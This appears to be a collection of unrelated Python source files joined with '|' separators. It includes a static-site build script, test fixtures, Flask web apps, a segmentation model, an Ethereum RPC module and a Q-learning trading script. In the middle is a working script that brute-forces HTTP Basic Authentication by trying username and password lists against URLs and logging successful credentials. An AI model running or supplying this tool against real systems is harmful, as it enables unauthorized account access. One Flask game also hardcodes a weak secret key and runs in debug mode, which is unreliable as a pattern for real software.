'''Preview website content'''
os.environ['PELICAN_ENV'] = 'DEV'
html(output=output)
shell(f'cd {output}; python -m http.server')
def publish(output='output', branch='gh-pages'):
'''Push content to GitHub Pages'''
os.environ['PELICAN_ENV'] = 'PROD'
html(output=output)
shell([
f'ghp-import -m "Generate Pelican site" -b {branch} {output}',
f'git push origin {branch}'
])
def convert(notebook, input='jupyter', output='content'):
'''Convert a jupyter notebook to a pelican-compatible markdown file'''
shell([
f'cp {input}/{notebook}.ipynb {output}/{notebook}.ipynb',
f'cd {output}; jupyter nbconvert --to markdown {notebook}.ipynb',
f'cd {output}; rm {notebook}.ipynb'
])
if os.path.isdir(f'{output}/{notebook}_files'):
shell([
f'cd {output}; cp -a {notebook}_files/. images/',
f'cd {output}; rm -rf {notebook}_files'
])
with open(f'{output}/{notebook}.md', encoding='UTF-8') as f:
chapter = f.read().strip()
chapter = chapter.replace(f'({notebook}_files/', '(images/')
with open(f'{output}/{notebook}.md', 'w', encoding='UTF-8') as f:
f.write(chapter)
def flush(output='output'):
shell(f'rm -rf {output}')
if __name__ == '__main__':
Fire({
'local': local,
'publish': publish,
'convert': convert,
'flush': flush
})
|
import pathlib
import sys
import pytest
from testsuite.databases.mysql import discover
pytest_plugins = [
'testsuite.pytest_plugin',
'testsuite.databases.mysql.pytest_plugin',
]
def pytest_addoption(parser):
group = parser.getgroup('Example service')
group.addoption(
'--example-service-port',
help='Bind example services to this port (default is %(default)s)',
default=8080,
type=int,
)
@pytest.fixture
async def example_service(
ensure_daemon_started,
# Service process holder
example_service_scope,
# Service dependencies
mockserver,
mysql,
):
# Start service if not started yet
await ensure_daemon_started(example_service_scope)
@pytest.fixture
async def example_client(
create_service_client, example_service_baseurl, example_service,
):
# Create service client instance
return create_service_client(example_service_baseurl)
@pytest.fixture(scope='session')
def example_service_baseurl(pytestconfig):
return f'http://localhost:{pytestconfig.option.example_service_port}/'
@pytest.fixture(scope='session')
def example_root():
"""Path to example service root."""
return pathlib.Path(__file__).parent.parent
@pytest.fixture(scope='session')
async def example_service_scope(
pytestconfig,
create_daemon_scope,
example_root,
example_service_baseurl,
mysql_local,
mysql_conninfo,
):
async with create_daemon_scope(
args=[
sys.executable,
str(example_root.joinpath('server.py')),
'--port',
str(pytestconfig.option.example_service_port),
'--mysql-host',
mysql_conninfo.hostname,
'--mysql-port',
str(mysql_conninfo.port),
'--mysql-user',
mysql_conninfo.user,
'--mysql-dbname',
mysql_local['chat_messages'].dbname,
],
check_url=example_service_baseurl + 'ping',
) as scope:
yield scope
@pytest.fixture(scope='session')
def mysql_local(example_root):
return discover.find_schemas([example_root.joinpath('schemas/mysql')])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=C0103
# pylint: disable=C0413
# pylint: disable=W0702
'''
Script that tries list of passwords against HTTP Basic Authorization.
Dependencies:
* python2
# Debian/Ubuntu: apt-get install python
# Fedora: dnf install python
* requests
# Debian/Ubuntu: apt-get install python-requests
# Fedora: dnf install python2-requests
'''
import calendar
import os
import sys
import time
import requests
from requests.auth import HTTPBasicAuth
if len(sys.argv) != 4:
print 'Usage: ' + sys.argv[0] + ' [urls-file] [usernames-file] [passwords-file]'
print " * urls-file - File that contains list of urls."
print " * userbames-file - File that contains list of usernames."
print " * passwords-file - File that contains list of passwords.\n"
sys.exit(1)
URLS_FILE = sys.argv[1]
USERNAMES_FILE = sys.argv[2]
PASSWORDS_FILE = sys.argv[3]
for filename in [URLS_FILE, USERNAMES_FILE, PASSWORDS_FILE]:
if not os.path.isfile(filename):
print 'Error: file ' + '"' + filename + '"' + " doesn't exist.\n"
sys.exit(1)
URLS = list()
RESULT_FILE = 'http-basic-auth-brute-' + str(calendar.timegm(time.gmtime())) + '.csv'
RESULT_FILE = os.path.dirname(os.path.realpath(__file__)) + '/' + RESULT_FILE
with open(URLS_FILE, 'r') as urls_file:
for url in urls_file:
url = url.strip()
if url not in URLS:
URLS.append(url)
if bool(URLS):
for url in URLS:
print '> Testing URL: ' + url
with open(USERNAMES_FILE, 'r') as usernames:
for username in usernames.readlines():
username = username.strip()
found = None
with open(PASSWORDS_FILE, 'r') as passwords:
for password in passwords.readlines():
password = password.strip()
try:
response = requests.get(
url,
auth=HTTPBasicAuth(username, password),
timeout=3
)
sys.stdout.write('.')
sys.stdout.flush()
if response.status_code != 401:
print
print '> Success: ' + username + ':' + password
found = url + ',' + username +',' + password
except KeyboardInterrupt:
print
sys.exit(0)
except:
pass
if bool(found):
with open(RESULT_FILE, 'a+') as result_file:
result_file.write(url + ',' + found + "\n")
break
if bool(found):
break
print
print '> Finished.'
|
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from mayan.apps.smart_settings.classes import Namespace
from .literals import (
DEFAULT_DOCUMENT_BODY_TEMPLATE, DEFAULT_LINK_BODY_TEMPLATE
)
namespace = Namespace(label=_('Mailing'), name='mailer')
setting_link_subject_template = namespace.add_setting(
default=_('Link for document: {{ document }}'),
help_text=_('Template for the document link email form subject line.'),
global_name='MAILER_LINK_SUBJECT_TEMPLATE', quoted=True
)
setting_link_body_template = namespace.add_setting(
default=DEFAULT_LINK_BODY_TEMPLATE,
help_text=_('Template for the document link email form body text. Can include HTML.'),
global_name='MAILER_LINK_BODY_TEMPLATE', quoted=True
)
setting_document_subject_template = namespace.add_setting(
default=_('Document: {{ document }}'),
help_text=_('Template for the document email form subject line.'),
global_name='MAILER_DOCUMENT_SUBJECT_TEMPLATE', quoted=True
)
setting_document_body_template = namespace.add_setting(
default=DEFAULT_DOCUMENT_BODY_TEMPLATE,
help_text=_('Template for the document email form body text. Can include HTML.'),
global_name='MAILER_DOCUMENT_BODY_TEMPLATE', quoted=True
)
|
#!/usr/bin/env python3
# Import data
with open('/home/agaspari/aoc2021/dec_10/dec10_input.txt') as f:
nav_lines = f.read().split('\n')
openers = ['<', '(', '[', '{']
closers = ['>', ')', ']', '}']
# Task 1: Find all of the corrupted lines
corrupted_char = list()
for line in nav_lines:
curr_chunk = list()
for char in line:
if char in openers:
curr_chunk.append(char)
else:
most_recent_open = curr_chunk[-1]
if openers.index(most_recent_open) == closers.index(char):
curr_chunk.pop()
else:
corrupted_char.append(char)
break
syntax_checker_score = 0
for char in corrupted_char:
if char == ')':
syntax_checker_score += 3
elif char == ']':
syntax_checker_score += 57
elif char == '}':
syntax_checker_score += 1197
else:
syntax_checker_score += 25137
print(syntax_checker_score)
# Task 2: Finish the lines
all_autocomplete_scores = list()
for line in nav_lines:
curr_chunk = list()
for char in line:
if char in openers:
curr_chunk.append(char)
else:
most_recent_open = curr_chunk[-1]
if openers.index(most_recent_open) == closers.index(char):
curr_chunk.pop()
else:
break
else:
continue
chars_to_close = list()
for left_open in curr_chunk[::-1]:
chars_to_close.append(closers[openers.index(left_open)])
autocomplete_score = 0
for char in chars_to_close:
if char == ')':
autocomplete_score *= 5
autocomplete_score += 1
elif char == ']':
autocomplete_score *= 5
autocomplete_score += 2
elif char == '}':
autocomplete_score *= 5
autocomplete_score += 3
else:
autocomplete_score *= 5
autocomplete_score += 4
all_autocomplete_scores.append(autocomplete_score)
sorted_scores = sorted(all_autocomplete_scores)
print(sorted_scores[len(sorted_scores) // 2])
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: define random api
import paddle.fluid as fluid
from paddle.fluid import core
__all__ = ['manual_seed']
def manual_seed(seed):
"""
Sets the seed for global default generator, which manages the random number generation.
Args:
seed(int): The random seed to set. It is recommend to set a large int number.
Returns:
Generator: The global default generator object.
Examples:
.. code-block:: python
import paddle
gen = paddle.manual_seed(102)
"""
#TODO(zhiqiu): 1. remove program.random_seed when all random-related op upgrade
# 2. support gpu generator by global device
seed = int(seed)
core.default_cpu_generator()._is_init_py = True
return core.default_cpu_generator().manual_seed(seed)
def _manual_program_seed(seed):
"""
Sets global seed for generating random numbers.
NOTE(zhiqiu): This is the original implemention of manual_seed. Keeps it temporally
since CUDA generator is not developed, so we need it in the unittest.
Args:
seed(int): The random seed to set. It is recommend to set a large int number.
Returns:
None
"""
fluid.default_main_program().random_seed = seed
fluid.default_startup_program().random_seed = seed
program = fluid.Program()
program.global_seed(seed)
|
from flask import render_template, session, redirect, url_for, abort, flash, request, current_app, make_response
from datetime import datetime
from . import main
from .forms import EditProfileForm, EditProfileAdminForm, PostForm, CommentForm
from .. import db
from ..models import User, Role, Permission, Post, Comment
from flask_login import login_required, current_user
from ..decorators import admin_required, permission_required
@main.route('/', methods=['GET', 'POST'])
def index():
form = PostForm()
if current_user.can(Permission.WRITE) and form.validate_on_submit():
post = Post(body=form.body.data, author=current_user._get_current_object())
db.session.add(post)
return redirect(url_for('.index'))
show_followed = False
if current_user.is_authenticated:
show_followed = bool(request.cookies.get('show_followed', ''))
if show_followed:
query = current_user.followed_posts
else:
query = Post.query
page = request.args.get('page', 1, type=int)
pagination = query.order_by(Post.timestamp.desc()).paginate(page,
per_page=current_app.config['FLASK_POSTS_PER_PAGE'], error_out=False)
posts = pagination.items
return render_template("index.html", form=form, posts=posts, pagination=pagination)
@main.route('/user/<username>')
def user(username):
user = User.query.filter_by(username=username).first()
if user is None:
abort(404)
page = request.args.get('page', 1, type=int)
pagination = Post.query.order_by(Post.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASK_POSTS_PER_PAGE'], error_out=False)
posts = pagination.items
return render_template('user.html', user=user, posts=posts, pagination=pagination)
@main.route('/edit-profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
form = EditProfileForm()
if form.validate_on_submit():
current_user.name = form.name.data
current_user.location = form.location.data
current_user.about_me = form.about_me.data
db.session.add(current_user)
flash('你的信息已更新!')
return redirect(url_for('.user', username=current_user.username))
form.name.data = current_user.name
form.location.data = current_user.location
form.about_me.data = current_user.about_me
return render_template('edit_profile.html', form=form)
@main.route('/edit-profile/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_profile_admin(id):
user = User.query.get_or_404(id)
form = EditProfileAdminForm(user=user)
if form.validate_on_submit():
user.email = form.email.data
user.username = form.username.data
user.confirmed = form.confirmed.data
user.role = Role.query.get(form.role.data)
user.name = form.name.data
user.location = form.location.data
user.about_me = form.about_me.data
db.session.add(user)
db.session.commit()
flash('信息已经更新')
return redirect(url_for('.user', username=user.username))
form.email.data = user.email
form.username.data = user.username
form.confirmed.data = user.confirmed
form.role.data = user.role_id
form.name.data = user.name
form.location.data = user.location
form.about_me.data = user.about_me
return render_template('edit_profile.html', form=form, user=user)
@main.route('/post/<int:id>', methods=['GET', 'POST'])
def post(id):
post = Post.query.get_or_404(id)
form = CommentForm()
if form.validate_on_submit():
comment = Comment(body=form.body.data,
post=post,
author=current_user._get_current_object())
db.session.add(comment)
flash('你的评论已经发表!')
return redirect(url_for('.post', id=post.id, page=-1))
page = request.args.get('page', 1, type=int)
if page == -1:
page = (post.comments.count() - 1) / current_app.config['FLASK_COMMENTS_PER_PAGE'] + 1
pagination = post.comments.order_by(Comment.timestamp.asc()).paginate(
page, per_page=current_app.config['FLASK_COMMENTS_PER_PAGE'], error_out=False)
comments = pagination.items
return render_template('post.html', posts=[post], form=form, comments=comments, pagination=pagination)
@main.route('/edit/<int:id>', methods=['GET', 'POST'])
@login_required
def edit(id):
post = Post.query.get_or_404(id)
if current_user != post.author and not current_user.can(Permission.ADMIN):
abort(403)
form = PostForm()
if form.validate_on_submit():
post.body = form.body.data
db.session.add(post)
flash('文章已经更新.')
return redirect(url_for('.post', id=post.id))
form.body.data = post.body
return render_template('edit_post.html', form=form)
@main.route('/follow/<username>')
@login_required
@permission_required(Permission.FOLLOW)
def follow(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('非法用户', 'danger')
return redirect(url_for('.index'))
if current_user.is_following(user):
flash('你已经关注了该用户', 'warning')
return redirect(url_for('.user', username=username))
current_user.follow(user)
flash('你正在关注 %s' % username, 'success')
return redirect(url_for('.user', username=username))
@main.route('/unfollow/<username>')
@login_required
@permission_required(Permission.FOLLOW)
def unfollow(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('非法用户', 'danger')
return redirect(url_for('.index'))
if not current_user.is_following(user):
flash('你没有关注该用户', 'danger')
return redirect(url_for('.user', username=username))
current_user.unfollow(user)
db.session.commit()
flash('你取消关注了 %s' % username, 'success')
return redirect(url_for('.user', username=username))
@main.route('/followers/<username>')
def followers(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('非法用户', 'danger')
return redirect(url_for('.index'))
page = request.args.get('page', 1, type=int)
pagination = user.followers.paginate(page, per_page=current_app.config['FLASK_POSTS_PER_PAGE'], error_out=False)
follows = [{'user': item.follower, 'timestamp': item.timestamp} for item in pagination.items]
return render_template('followers.html', user=user, title='Followers of', endpoint='.followers', pagination=pagination, follows=follows)
@main.route('/followed_by/<username>')
def followed_by(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('非法用户', 'danger')
return redirect(url_for('.index'))
page = request.args.get('page', 1, type=int)
pagination = user.followed.paginate(page, per_page=current_app.config['FLASK_POSTS_PER_PAGE'], error_out=False)
follows = [{'user': item.followed, 'timestamp': item.timestamp} for item in pagination.items]
return render_template('followers.html', user=user, title='Followed by', endpoint='.followed_by', pagination=pagination, follows=follows)
@main.route('/all')
@login_required
def show_all():
resp = make_response(redirect(url_for('.index')))
resp.set_cookie('show_followed', '', max_age=30*24*60*60)
return resp
@main.route('/followed')
@login_required
def show_followed():
resp = make_response(redirect(url_for('.index')))
resp.set_cookie('show_followed', '1', max_age=30*24*60*60)
return resp
@main.route('/moderate')
@login_required
@permission_required(Permission.MODERATE)
def moderate():
page = request.args.get('page', 1, type=int)
pagination = Comment.query.order_by(Comment.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASK_COMMENTS_PER_PAGE'], error_out=False
)
comments = pagination.items
return render_template('moderate.html', comments=comments, pagination=pagination, page=page)
@main.route('/moderate/enable/<int:id>')
@login_required
@permission_required(Permission.MODERATE)
def moderate_enable(id):
comment = Comment.query.get_or_404(id)
comment.disabled = False
db.session.add(comment)
return redirect(url_for('.moderate', page=request.args.get('page', 1, type=int)))
@main.route('/moderate/disable/<int:id>')
@login_required
@permission_required(Permission.MODERATE)
def moderate_disable(id):
comment = Comment.query.get_or_404(id)
comment.disabled = True
db.session.add(comment)
return redirect(url_for('.moderate', page=request.args.get('page', 1, type=int)))
|
from flask import Flask, session, redirect, render_template, request
import random
from datetime import datetime
app = Flask(__name__)
app.secret_key='This'
@app.route('/')
def start():
if not ('gold') in session:
session['gold'] = 0;
if not ('activities') in session:
session['activities'] = {}
return render_template('index.html', gold = session['gold'], activities = session['activities'])
@app.route('/process_money', methods=['POST'])
def money():
now = datetime.now()
buildings = {
'farm': random.randrange(10,21),
'cave': random.randrange(5,11),
'house': random.randrange(2,6),
'casino': random.randrange(0,51)
}
session['green'] = 'green'
session['red']='red'
if request.form['building'] == 'casino':
result = buildings[request.form['building']]
rand = random.randrange(0,2)
if rand == 0:
session['gold'] += result
session['activities'].update({'Entered a casion and gained {} gold! ({})'.format(buildings[request.form['building']], now): session['green']})
else:
session['gold'] -= result
session['activities'].update({'Entered a casion and lost {} gold...Ouch... ({})'.format(buildings[request.form['building']], now): session['red']})
elif request.form['building'] in buildings:
result = buildings[request.form['building']]
session['gold'] += result
session['activities'].update({'Earned {} gold from the farm! ({})'.format(buildings[request.form['building']], now): session['green']})
return redirect('/')
app.run(debug=True)
|
import keras
from keras.models import *
from keras.layers import *
import keras.backend as K
from .config import IMAGE_ORDERING
from .model_utils import get_segmentation_model , resize_image
from .vgg16 import get_vgg_encoder
from .mobilenet import get_mobilenet_encoder
from .basic_models import vanilla_encoder
from .resnet50 import get_resnet50_encoder
if IMAGE_ORDERING == 'channels_first':
MERGE_AXIS = 1
elif IMAGE_ORDERING == 'channels_last':
MERGE_AXIS = -1
def pool_block( feats , pool_factor ):
if IMAGE_ORDERING == 'channels_first':
h = K.int_shape( feats )[2]
w = K.int_shape( feats )[3]
elif IMAGE_ORDERING == 'channels_last':
h = K.int_shape( feats )[1]
w = K.int_shape( feats )[2]
pool_size = strides = [int(np.round( float(h) / pool_factor)), int(np.round( float(w )/ pool_factor))]
x = AveragePooling2D(pool_size , data_format=IMAGE_ORDERING , strides=strides, padding='same')( feats )
x = Conv2D(512, (1 ,1 ), data_format=IMAGE_ORDERING , padding='same' , use_bias=False )( x )
x = BatchNormalization()(x)
x = Activation('relu' )(x)
x = resize_image( x , strides , data_format=IMAGE_ORDERING )
return x
def _pspnet( n_classes , encoder , input_height=384, input_width=576 ):
assert input_height%192 == 0
assert input_width%192 == 0
img_input , levels = encoder( input_height=input_height , input_width=input_width )
[f1 , f2 , f3 , f4 , f5 ] = levels
o = f5
pool_factors = [ 1, 2 , 3 , 6 ]
pool_outs = [o ]
for p in pool_factors:
pooled = pool_block( o , p )
pool_outs.append( pooled )
o = Concatenate( axis=MERGE_AXIS)(pool_outs )
o = Conv2D(512, (1,1), data_format=IMAGE_ORDERING, use_bias=False )( o )
o = BatchNormalization()( o )
o = Activation('relu' )( o )
o = Conv2D( n_classes , (3,3), data_format=IMAGE_ORDERING, padding='same' )(o )
o = resize_image( o , (8 , 8 ) , data_format=IMAGE_ORDERING )
model = get_segmentation_model(img_input , o )
return model
def pspnet( n_classes , input_height=384, input_width=576 ) :
model = _pspnet( n_classes , vanilla_encoder , input_height=input_height, input_width=input_width )
model.model_name = "pspnet"
return model
def vgg_pspnet( n_classes , input_height=384, input_width=576 ):
model = _pspnet( n_classes , get_vgg_encoder , input_height=input_height, input_width=input_width )
model.model_name = "vgg_pspnet"
return model
def resnet50_pspnet( n_classes , input_height=384, input_width=576 ):
model = _pspnet( n_classes , get_resnet50_encoder , input_height=input_height, input_width=input_width )
model.model_name = "resnet50_pspnet"
return model
def pspnet_50( n_classes , input_height=473, input_width=473 ):
from ._pspnet_2 import _build_pspnet
nb_classes = n_classes
resnet_layers = 50
input_shape=(input_height, input_width)
model = _build_pspnet(nb_classes=nb_classes,
resnet_layers=resnet_layers,
input_shape=input_shape)
model.model_name = "pspnet_50"
return model
def pspnet_101( n_classes , input_height=473, input_width=473 ):
from ._pspnet_2 import _build_pspnet
nb_classes = n_classes
resnet_layers = 101
input_shape=(input_height, input_width)
model = _build_pspnet(nb_classes=nb_classes,
resnet_layers=resnet_layers,
input_shape=input_shape)
model.model_name = "pspnet_101"
return model
# def mobilenet_pspnet( n_classes , input_height=224, input_width=224 ):
# model = _pspnet( n_classes , get_mobilenet_encoder , input_height=input_height, input_width=input_width )
# model.model_name = "mobilenet_pspnet"
# return model
if __name__ == '__main__':
m = _pspnet( 101 , vanilla_encoder )
# m = _pspnet( 101 , get_mobilenet_encoder ,True , 224 , 224 )
m = _pspnet( 101 , get_vgg_encoder )
m = _pspnet( 101 , get_resnet50_encoder )
|
#!/usr/bin/env
# -*- coding: utf-8 -*-
"""
Copyright 2017-2018 Jagoba Pérez-Gómez
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ml_algorithms.models import ModelTest
def select_option():
print('1. Linear')
print('2. Gaussian NB')
print('3. SVR')
print('4. Logistic Regression')
print('5. K Neighbours Classifier')
print('6. Decision Tree Classifier')
print('7. SVC')
print('8. Exit')
return int(input('Your selection [1-8]:'))
def load_script(model_test, option):
if option == 1:
model_test.test_linear()
elif option == 2:
model_test.test_gaussian_nb()
elif option == 3:
model_test.test_svr()
elif option == 4:
model_test.test_logistic_regression()
elif option == 5:
model_test.test_knn_classifier()
elif option == 6:
model_test.test_decision_tree_classifier()
elif option == 7:
model_test.test_svc()
if __name__ == '__main__':
option = 0
model_test = ModelTest()
model_test.prepare_data_set()
while option != 8:
option = select_option()
load_script(model_test, option)
|
from typing import (
Any
)
from eth_utils import (
encode_hex,
)
from eth.chains.base import (
Chain
)
from eth.tools.fixture_tests import (
apply_fixture_block_to_chain,
new_chain_from_fixture,
normalize_block,
normalize_blockchain_fixtures,
)
from trinity.rpc.format import (
format_params,
)
from trinity.rpc.modules import (
RPCModule,
)
class EVM(RPCModule):
@format_params(normalize_blockchain_fixtures)
def resetToGenesisFixture(self, chain_info: Any) -> Chain:
'''
This method is a special case. It returns a new chain object
which is then replaced inside :class:`~trinity.rpc.main.RPCServer`
for all future calls.
'''
return new_chain_from_fixture(chain_info)
@format_params(normalize_block)
def applyBlockFixture(self, block_info: Any) -> str:
'''
This method is a special case. It returns a new chain object
which is then replaced inside :class:`~trinity.rpc.main.RPCServer`
for all future calls.
'''
_, _, rlp_encoded = apply_fixture_block_to_chain(block_info, self._chain)
return encode_hex(rlp_encoded)
|
import pandas as pd
import datetime
from sklearn.linear_model import LinearRegression
from matplotlib import pyplot
import numpy as np
import random
#df.head()
#df.tail()
def rsi(df):
'''This function builds Relative Strength Indicator.
Returns:
-------------
DataFrame of stock prices and RSI
'''
delta = df['detrended_price_adj'].diff()
up, down = delta.copy(), delta.copy()
up[up < 0] = 0
down[down > 0] = 0
roll_up2 = up.rolling(14).mean()
roll_down2 = down.abs().rolling(14).mean()
rsi_raw = roll_up2/roll_down2
rsi = 100.0 - (100.0 / (1.0 + rsi_raw))
df['RSI'] = rsi
return df[['Date', 'Close', 'detrended_price_adj', 'RSI','Volume']]
def macd(df):
df['ema_price_12'] = df['detrended_price_adj'].ewm(span = 12, adjust = True, ignore_na=True).mean()
df['ema_price_26'] = df['detrended_price_adj'].ewm(span = 26, adjust = True, ignore_na=True).mean()
df['macd'] = df['ema_price_12'] - df['ema_price_26']
df['signal_line'] = df['macd'].ewm(span = 9, adjust = True, ignore_na=True).mean()
df['macd_diff_signal'] = df['macd'] - df['signal_line']
return df[['Date', 'Close', 'macd', 'signal_line','macd_diff_signal','Volume', 'RSI','detrended_price_adj']]
def parser(x):
return datetime.strptime('190'+x, '%Y-%m')
series = pd.read_csv('POCs/RL/apple.csv', header=0, parse_dates=[0], index_col=0, squeeze=True)
series = series.reset_index()
# fit linear model
X = [i for i in range(0, len(series))]
X = np.reshape(X, (len(X), 1))
y = series.Close
model = LinearRegression()
model.fit(X, y)
# calculate trend
trend = model.predict(X)
# plot trend
pyplot.plot(y)
pyplot.plot(trend)
pyplot.show()
# detrend
detrended = [y[i]-trend[i] for i in range(0, len(series))]
# plot detrended
pyplot.plot(detrended)
pyplot.show()
detrended_df = pd.merge(series, pd.DataFrame(detrended), how='left', left_index=True, right_index=True)
detrended_df = detrended_df.rename(columns={0:'detrended_price'})
detrended_df['detrended_price_adj'] = detrended_df['detrended_price'] + abs(detrended_df['detrended_price'].min())
df = rsi(detrended_df)
df = macd(df)
# plot the RSI and detrended adjusted price
df.plot('Date', ['detrended_price_adj','RSI']) # correlation makes sense still
df.plot('Date', ['detrended_price_adj','Close']) # comparing the detrended adjusted price to the closing price
# limit the df to work with manageable dataset for debugging
df = df.iloc[15:].reset_index()
"""DONE"""
## clean up the code above to spit out clean data that the RL agent can work with
## define the states
## define the actions
## define the reward function
## define a function to identify the state the agent is
## define a function that lets the agent choose an action
## define the q-matrix and how to calculate it
## define the update the method
## add exploration vs. exploitation rate instead of randomly choosing at step 1 then basing off q-value
## add more states based on other indicators (added MACD)
## record the actions and plot out how it would look like in terms of $$ gains
## change reward function from -1, 0 and 1 to delta of today_price- yesterday_price
## add a decaying exploration function
# when exploring, choose any action that is not highest q-value
"""TO BE COMPLETED"""
## double check the reward and q_value calculation to make sure it works as intended
## add even more states based on other indicators
# add MACD movement direction (if MACD,t=0 < avg(MACD,t={-3:-1}), then MACD movement direction is down)
# add RSI movement direction (similar to MACD movement calculation above)
## add contraints (cant sell if there is no stock in holding)
## review the q_update calculation, potentially change it
def state_action_pair():
states = ['RSI<25 & MACD < 0', 'RSI<50 & MACD < 0', 'RSI<75 & MACD < 0', 'RSI<100 & MACD < 0',
'RSI<25 & MACD > 0', 'RSI<50 & MACD > 0', 'RSI<75 & MACD > 0', 'RSI<100 & MACD > 0']
q_table = pd.DataFrame(states).rename(columns={0:'states'})
q_table['B'],q_table['S'],q_table['H'] = 0,0,0
return q_table
def get_current_state(df, i):
rsi = df.iloc[i]['RSI']
macd = df.iloc[i]['macd_diff_signal']
# RSI changes, macd is fixed
if rsi < 25 and macd < 0:
rsi_state = 'RSI<25 & MACD < 0'
elif rsi < 50 and macd < 0:
rsi_state = 'RSI<50 & MACD < 0'
elif rsi < 75 and macd < 0:
rsi_state = 'RSI<75 & MACD < 0'
elif rsi < 100 and macd < 0:
rsi_state = 'RSI<100 & MACD < 0'
# MACD changes, RSI is fixed
if rsi < 25 and macd > 0:
rsi_state = 'RSI<25 & MACD > 0'
elif rsi < 50 and macd > 0:
rsi_state = 'RSI<50 & MACD > 0'
elif rsi < 75 and macd > 0:
rsi_state = 'RSI<75 & MACD > 0'
elif rsi < 100 and macd > 0:
rsi_state = 'RSI<100 & MACD > 0'
else:
print('rsi unknown')
return rsi_state
def choose_action(q_table, rsi_state, epsilon):
# at first iteration, always randomly pick an action
if q_table.loc[rsi_state]['B']==q_table.loc[rsi_state]['H']==q_table.loc[rsi_state]['S']:
action_choice = random.choice(['B','H','S'])
print('chosen randomly ', action_choice)
action_choice_type = '1st run, random'
# at any subsequent iteration, either explore (with p = eps) or exploit highest q-value (with p=1-eps)
else:
random_ = random.uniform(0,1)
if random_ < epsilon:
max_value_choice = q_table.loc[rsi_state].idxmax(axis=1)
action_list = ['B','H','S']
refined_action_list = [value for value in action_list if value != max_value_choice]
action_choice = random.choice(refined_action_list)
action_choice_type = 'exploring, not 1st run'
print('action ', action_choice, ' chosen randomly, random prob: ', random_, ' epsilon: ', epsilon)
else:
action_choice = q_table.loc[rsi_state].idxmax(axis=1)
action_choice_type = ' q_value based'
print('action ', action_choice, ' chosen based on q-value, random prob: ', random_, ' epsilon: ', epsilon)
return action_choice, action_choice_type
# At EOD of the trading day, calculate the reward of the action taken at the beginnning of the day
def get_reward(df, i, j):
recent_price = df[df.index==i]['detrended_price_adj'].values[0]
old_price = df[df.index==j]['detrended_price_adj'].values[0]
if recent_price > old_price:
return recent_price - old_price
elif recent_price == old_price:
return 0
elif recent_price < old_price:
return recent_price - old_price
## function creates a table with default value of 0.9 for epsilon for each state specified in the q_table
def decaying_epsilon_table(q_table):
states = list(q_table.index)
decay_eps_table = pd.DataFrame(states).rename(columns={0:'states'})
decay_eps_table['decaying eps'] = 0.90
return decay_eps_table
## function renders the most recent decayed epsilon rate for a given state and its row index
def get_decaying_eps_rate(rsi_state, decay_eps_table):
current_eps = decay_eps_table[decay_eps_table['states']==rsi_state]['decaying eps'].values[0]
current_eps_index = decay_eps_table.index[decay_eps_table['states']==rsi_state][0]
return current_eps, current_eps_index
## function updates the given current epsilon value by multiplying by 0.999 therefore gradually decreasing it to ensure
## adequate exposure to different environments for each pre-specified state
def update_decaying_eps_rate(current_eps, current_eps_index, decay_eps_table):
decay_eps_table.at[current_eps_index, 'decaying eps'] = current_eps*0.975
return decay_eps_table
q_table = state_action_pair()
q_table = q_table.set_index('states')
ALPHA = 0.8
GAMMA = 0.5
pd.options.display.float_format = '{:.4f}'.format
pd.set_option('display.max_columns', 500)
historical_action_table = pd.DataFrame(columns={'date', 'state', 'action', 'reward',
'price', 'action_choice', 'epsilon'})
decay_eps_table = decaying_epsilon_table(q_table)
for i in range(1,1256):
j = i-1
reward = get_reward(df, i, j)
rsi_state = get_current_state(df, i)
print('the state is ', rsi_state)
current_eps, current_eps_index = get_decaying_eps_rate(rsi_state, decay_eps_table)
print(current_eps, current_eps_index)
update_decaying_eps_rate(current_eps, current_eps_index, decay_eps_table)
print(decay_eps_table)
action_choice, action_choice_type = choose_action(q_table, rsi_state, current_eps)
old_q_value = q_table.loc[rsi_state,action_choice]
print('old q_value is ', old_q_value)
new_q_value = old_q_value + ALPHA*(reward + GAMMA*old_q_value)
print('new q_value is ', new_q_value)
q_table.loc[rsi_state, action_choice] = new_q_value
print(q_table)
# fill in the historical action table analysis at a later time
historical_action_table = historical_action_table.append({'date':str(df[df.index==i]['Date'].values[0])[:10],
'state':rsi_state, 'action':action_choice,
'reward':reward, 'price':df[df.index==i]['Close'].values[0],
'action_choice':action_choice_type, 'epsilon':current_eps},
ignore_index=True)
print('--------------------------------------------')
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import os
import tempfile
import unittest
import numpy as np
from torchrec.datasets.criteo import CAT_FEATURE_COUNT, INT_FEATURE_COUNT
from torchrec.datasets.scripts.npy_preproc_criteo import main
from torchrec.datasets.test_utils.criteo_test_utils import CriteoTest
class MainTest(unittest.TestCase):
def test_main(self) -> None:
num_rows = 10
name = "day_0"
with CriteoTest._create_dataset_tsv(
num_rows=num_rows,
filename=name,
) as in_file_path, tempfile.TemporaryDirectory() as output_dir:
main(
[
"--input_dir",
os.path.dirname(in_file_path),
"--output_dir",
output_dir,
]
)
dense = np.load(os.path.join(output_dir, name + "_dense.npy"))
sparse = np.load(os.path.join(output_dir, name + "_sparse.npy"))
labels = np.load(os.path.join(output_dir, name + "_labels.npy"))
